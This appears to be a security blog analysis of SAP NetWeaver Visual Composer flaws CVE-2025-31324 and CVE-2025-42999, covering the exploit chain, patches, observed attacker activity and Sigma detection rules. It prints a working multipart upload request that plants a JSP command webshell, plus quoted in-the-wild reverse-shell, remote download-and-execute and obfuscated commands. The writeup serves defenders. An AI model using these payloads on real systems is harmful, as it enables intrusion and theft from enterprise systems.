SAP NetWeaver VC (CVE-2025-31324 & CVE-2025-42999)

How an obscure endpoint turned SAP NetWeaver into a webshell wonderland

SAP NetWeaver VC (CVE-2025-31324 & CVE-2025-42999)

On April 24, 2025, SAP issued an out-of-band security advisory for CVE-2025-31324, a perfect 10.0 CVSS vulnerability affecting SAP NetWeaver’s Visual Composer Framework. The flaw was simple, devastating, and actively exploited in the wild before disclosure. Within hours, every threat actor with a pulse was kicking down doors that had been left wide open since at least January 2025. However, the real “kill shot” for most enterprises came from the synergy between this flaw and its silent partner, CVE-2025-42999. While the former opened the door, the latter allowed attackers to move the furniture.

Here’s the thing about Visual Composer: it’s a legacy component that shipped with NetWeaver to let business analysts build apps without writing code. SAP deprecated it in 2015, but it’s still widely deployed because enterprise software has a half-life longer than uranium-238.

By chaining these two vulnerabilities, threat actors weren’t just glancing at sensitive data; they were achieving permanent Remote Code Execution (RCE) at the OS level. They were essentially “changing the locks” on the SAP kernel, ensuring that even if the initial entry point was closed, their presence remained embedded deep within the enterprise’s most critical systems.

The Vulnerability(s)

The Entry (CVE-2025-31324): A missing authorization check in the Metadata Uploader servlet provided the initial foothold. It allowed unauthenticated attackers to upload arbitrary file, but usually only into restricted, temporary directories that were wiped upon service restarts.

The Anchor (CVE-2025-42999): To achieve true persistence, attackers chained this with CVE-2025-42999, a path traversal vulnerability. By manipulating the file path during the upload process, they could break out of the temporary sandbox and drop webshells directly into the core SAP Java deployment folders.

The Technical Breakdown of the Chain

Public exploits for CVE-2025-31324 started circulating within 48 hours of disclosure. By August 2025, a chained exploit combining CVE-2025-31324 and CVE-2025-42999 appeared on Telegram, courtesy of the “Scattered Lapsus$ Hunters” group.

Here’s how the attack unfolds:

Stage 1: Initial Access (CVE-2025-31324)

The attacker sends a multipart POST request to the vulnerable endpoint:

POST /developmentserver/metadatauploader HTTP/1.1
Host: vulnerable-sap-server.com
Content-Type: multipart/form-data; boundary=----exploit
------exploit
Content-Disposition: form-data; name="file"; filename="helper.jsp"
Content-Type: application/octet-stream
<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  Process p = Runtime.getRuntime().exec(cmd);
  InputStream in = p.getInputStream();
  BufferedReader br = new BufferedReader(new InputStreamReader(in));
  String line;
  while ((line = br.readLine()) != null) {
    out.println(line + "<br>");
  }
%>
------exploit--

The servlet accepts the payload and writes it to:
/usr/sap/<SID>/J<instance>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/helper.jsp

Stage 2: Code Execution

Early attacker webshells we’re merely plaintext:

GET /irj/servlet/prt/portal/prtroot/helper.jsp?cmd=id HTTP/1.1
Host: vulnerable-sap-server.com

Response:

uid=1001(sidadm) gid=1001(sapsys) groups=1001(sapsys)

Game over. Full admin access achieved.

During the maturation of the exploitation, there was a shift from plain-text command parameters; to AES-encrypted JSP webshells

These shells did not accept a ?cmd= parameter. Instead, they listened for a POST request where the entire payload was an AES-encrypted blob. The key would often be hardcoded into the JSP or derived from a specific Cookie header.

Stage 3: Deserialization (CVE-2025-42999)

For attackers who want to avoid leaving JSP artifacts on disk, CVE-2025-42999 provides an alternative. By crafting a serialized Java object with malicious gadgets, attackers can achieve direct command execution through deserialization, no webshell required. This makes forensic analysis significantly harder because there’s no file to find.

The chained exploit uses CVE-2025-31324 to gain initial access, then leverages CVE-2025-42999 to execute commands in-memory through deserialization. The result is full system compromise with minimal forensic footprint.

Why It Matters

SAP NetWeaver sits at the heart of enterprise resource planning (ERP) systems managing payroll, supply chains, financial transactions, and HR data. Compromising a NetWeaver instance isn’t just a security incident, it’s a business-ending event. And because these systems are often on-prem with patch cycles measured in quarters, the window of exposure was enormous.

Impacted Versions and Patch Status

Affected Systems

All SAP NetWeaver AS Java 7.xx versions with the Visual Composer Framework (VCFRAMEWORK.SCA) installed are vulnerable. This includes all service packs (SPS) for NetWeaver 7.xx.

SAP’s non-public guidance recommends checking if your system is affected by navigating to http://host:port/nwa/sysinfo and searching for the software component VISUAL COMPOSER FRAMEWORK (VCFRAMEWORK.SCA). If it’s present, you’re vulnerable. If you get no results, the component isn’t installed, but don’t get too comfortable, because plenty of systems have it and never realized.

Patch Information

Initial Patch (April 24, 2025):
SAP Security Note 3594142 addresses the missing authorization check that enables unrestricted file uploads.

Follow-Up Patch (May 13, 2025):
SAP Security Note 3604119 patches CVE-2025-42999, a related deserialization vulnerability in Visual Composer that attackers were chaining with CVE-2025-31324. The second patch changes how Visual Composer processes certain files and removes the Java deserialization flaw that underpinned both vulnerabilities.

Critical Detail: Even if you patched CVE-2025-31324 in April, you’re not safe without the May patch. Attackers figured out how to chain these two vulnerabilities together, achieving what’s essentially “living off the land” execution, webshell-less command execution with full admin privileges.

Exploitation Analysis

What Was Observed

Between January and August 2025, multiple research teams documented exploitation in the wild. Here’s what the activity looked like:

Webshell Deployment Patterns

Attackers deployed JSP webshells with varying filenames:

Many of these shells originated from public GitHub repositories, attackers didn’t even bother writing custom code. They just grabbed working templates and modified the filenames.

Post-Exploitation Tactics on Linux

Once inside, attackers moved quickly. Here’s a sampling of observed commands in the wild investigations:

Reverse Shells:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((5.161.153[.]112,8443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

File Manipulation:

mv ../apps/sap.com/irj/servlet_jsp/irj/root/helper.jsp ../apps/sap.com/irj/servlet_jsp/irj/root/usage.jsp

This renames the webshell to evade detection after helper.jsp became a known IOC.

Tool Downloads:

wget http[:]//brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk -O /tmp/1
curl -o /tmp/1 http[:]//abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
curl -O https[:]//ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh

These commands pulled down additional malware from cloud storage (AWS S3, Aliyun OSS), including:

Base64 Obfuscation: To evade casual process monitoring, attackers Base64-encoded their commands:

bash -c {echo,d2dldCBodHRw...}|{base64,-d}|{bash,-i}

Decoded:

wget http[:]//abode-dashboard-media.s3.ap-south-1.amazonaws.com/BCYVrrHX -O /tmp/1 || curl -o /tmp/1 http://abode-dashboard-media.s3.ap-south-1.amazonaws.com/BCYVrrHX

Post-Exploitation Tactics on Windows

Windows exploitation followed similar patterns but leveraged native tooling:

PowerShell Downloads:

powershell Invoke-WebRequest -Uri "http[:]//65.49.235[.]210/download/2.jpg" -OutFile "cmake.exe"
powershell curl -o "C:\users\public\ansgdhs.bat" http[:]//101.32.26[.]154/rymhNszS/ansgdhs.bat
powershell IEX(New-Object Net.WebClient).DownloadString('https[:]//d-69b.pages[.]dev/sshb64.ps1')

Brute Ratel Deployment:

In multiple incidents, attackers uploaded C# code via the webshell, then compiled it using MSBuild:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\ProgramData\output.txt

The compiled payload retrieved Brute Ratel from external servers. Brute Ratel is a commercial C2 framework marketed to red teams but frequently abused by actual threat actors. It supports:

Heaven’s Gate Technique:

Attackers used the Heaven’s Gate technique to transition from 32-bit to 64-bit execution, bypassing security controls monitoring specific architectures. The telltale sign is the NtSetContextThread API call manipulating thread execution contexts.

Reverse SSH SOCKS Proxy:

One particularly sophisticated attack deployed a reverse SSH proxy via PowerShell:

powershell IEX(New-Object Net.WebClient).DownloadString('https[:]//d-69b.pages[.]dev/sshb64.ps1')

This script:

  1. Retrieved the system’s domain name and username
  2. Killed existing SSH processes
  3. Downloaded OpenSSH binaries from GitHub
  4. Generated SSH keys and uploaded the private key to 45.76.93[.]60
  5. Established a remote tunnel to the C2 server

Result: persistent, encrypted access tunneling through SSH, difficult to detect without deep packet inspection.

Reconnaissance Commands

Standard post-exploitation recon commands observed across incidents:

cat /etc/hosts
cat /etc/resolv.conf
cat ~/.bash_history
cat /etc/issue
crontab -l
ps -ef
df -a
last -n 30
netstat -tenp
nltest /domain
uname -a
ls /mnt
ls /var
ls /opt

Nothing fancy, just efficient enumeration to understand the environment and identify pivot points.

Considerations and Limitations

Attack Surface Reality

Visual Composer isn’t installed by default, but it’s present in a significant number of NetWeaver deployments because it was a core component for years. Organizations that deployed NetWeaver before 2015 likely have it enabled, and many never bothered to disable it post-deprecation.

The /developmentserver/ endpoint is intended for internal development use, but in practice, many organizations exposed their NetWeaver instances directly to the internet without proper network segmentation. Shodan searches in late April 2025 revealed thousands of exposed SAP systems, many still unpatched.

Detection Challenges

Traditional signature-based detection struggles here for several reasons:

  1. Legitimate Functionality: The vulnerable endpoint is a real, intended feature of Visual Composer. Normal metadata uploads look structurally similar to malicious ones.
  2. Webshell Variability: Attackers used dozens of different filenames and slightly modified JSP code. Signature-based webshell detection catches the obvious ones (helper.jsp, cache.jsp) but misses randomized names.
  3. Living Off the Land: When attackers chain CVE-2025-42999 for deserialization-based execution, there’s no file artifact to detect, commands execute entirely in memory.
  4. Legitimate Tools: Attackers used curl, wget, PowerShell’s Invoke-WebRequest, and MSBuild, all legitimate utilities present in normal environments.

Why Behavior Matters

This is where detection logic earns its keep. Instead of looking for specific filenames or signatures, effective detection focuses on behaviors that shouldn’t happen:

These behaviors are inherently suspicious regardless of the exploit used.

Detection and Hunting

Opportunities

Here are some SigmaHQ alert logic rules for higher fidelity malicious behaviors:

1. File Write to Web Root

Logic:

logsource:
    category: file_event
selection:
    TargetFilename|contains: 'servlet_jsp/irj/root/'
    TargetFilename|endswith: '.jsp'
condition: selection

2. SAP Processes Anomalies

Logic:

logsource:
    category: process_creation
    product: windows
selection:
    ParentImage|endswith: 
        - '\jstart.exe'
        - '\jcontrol.exe'
    Image|endswith:
        - '\cmd.exe'
        - '\powershell.exe'
        - '\bash'
        - '\sh'
        - '\python.exe'
condition: selection

3. Metadata Uploader Network Hook

Logic:

logsource:
    category: webserver
selection:
    cs-method: 'POST'
    cs-uri-query|contains: '/developmentserver/metadatauploader'
    Content-Type|contains: 'multipart/form-data'
condition: selection

4. Obfuscated Command Execution

Logic:

logsource:
    category: process_creation
    product: windows
selection:
    Image|endswith:
        - '\cmd.exe'
        - '\powershell.exe'
        - '\bash'
    CommandLine|contains:
        - 'base64'
        - 'FromBase64String'
    CommandLine|contains:
        - '-d'
        - '-decode'
condition: selection

5. Post-Exploitation Tooling

Logic:

logsource:
    category: process_creation
    product: windows
selection:
    Image|endswith:
        - '\curl.exe'
        - '\wget.exe'
        - '\MSBuild.exe'
    CommandLine|contains:
        - '/tmp'
        - 'C:\Temp'
        - 'C:\ProgramData'
condition: selection

6. SAP Outbound Anomaly

Logic:

logsource:
    category: network_connection
selection:
    Image|endswith:
        - '\jstart.exe'
        - '\msg_server.exe'
        - '\sapstartsrv.exe'
    DestinationPort: # Consider modifying this to be more inclusive
        - 8443
        - 4444
        - 4545
        - 3232
    Initiated: 'true'
filter_legitimate_ips:
    DestinationIp|startswith:
        - '10.'
        - '192.168.'
        - '172.16.'
condition: selection and not filter_legitimate_ips

7. Encrypted Webshell POST

Logic:

logsource:
    category: webserver
selection:
    cs-method: 'POST'
    cs-uri-query|endswith: '.jsp'
    Content-Type: 'application/octet-stream'
    # High entropy (>7.5) indicates encrypted/compressed binary data
    body_entropy|gt: 7.5 
condition: selection

Closing Assessment

CVE-2025-31324 is a textbook example of how a single missing authorization check in legacy code can create enterprise-scale carnage. Visual Composer was deprecated in 2015, but ten years later, it’s still deployed in thousands of SAP NetWeaver instances worldwide, a perfect storm of forgotten attack surface and critical business infrastructure.

The vulnerability’s active exploitation timeline tells the story:

The attackers had a three-month head start before the first patch dropped. Even after patching, organizations that only applied the April update remained vulnerable to deserialization attacks until May. And based on Shodan telemetry, dozens of exposed systems still haven’t patched as of late 2025.

Threat Actor Attribution

Multiple groups exploited this vulnerability:

The speed at which exploitation ramped up, from sophisticated APT actors to script kiddies, demonstrates how quickly critical vulnerabilities commoditize. The public release of chained exploits in August essentially handed remote code execution capabilities to anyone with basic network access to a vulnerable SAP server.

Final Thoughts

CVE-2025-31324 wasn’t sophisticated. It was a missing if (authenticated) { allow(); } check in a deprecated upload handler. But simplicity doesn’t mean low impact, this vulnerability compromised government agencies, financial institutions, healthcare providers, and manufacturing companies. The adversaries moved fast, chained vulnerabilities together, and adapted their tactics as defenders caught up.

The window between disclosure and widespread exploitation is shrinking. For critical infrastructure vulnerabilities like this, that window is measured in hours, not days. If your patch management process can’t accommodate emergency deployments, it’s time to rethink your operational security model.

SAP customers: Patch both CVE-2025-31324 and CVE-2025-42999. Hunt for webshells. Review your exposure. And if Visual Composer is still enabled in your environment, ask yourself why.

References